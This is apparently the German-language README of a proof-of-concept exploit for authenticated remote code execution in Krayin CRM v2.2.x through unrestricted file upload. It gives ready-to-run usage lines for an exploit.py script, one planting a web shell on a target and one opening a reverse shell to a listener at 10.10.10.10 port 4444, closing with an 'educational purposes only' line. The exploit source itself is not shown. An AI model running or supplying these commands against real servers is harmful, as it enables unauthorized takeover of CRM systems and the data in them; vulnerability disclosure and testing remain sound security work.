
Proof-of-Concept-Exploit für authentifizierte Remotecodeausführung in Krayin CRM v2.2.x über uneingeschränkten Dateiupload, mit Unterstützung für Web-Shell- und Reverse-Shell-Payloads.
PoC-Skript für eine kritische Sicherheitslücke in Krayin CRM v2.2.x, die authentifizierte RCE durch uneingeschränkten Dateiupload ermöglicht.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
Nur für Bildungszwecke.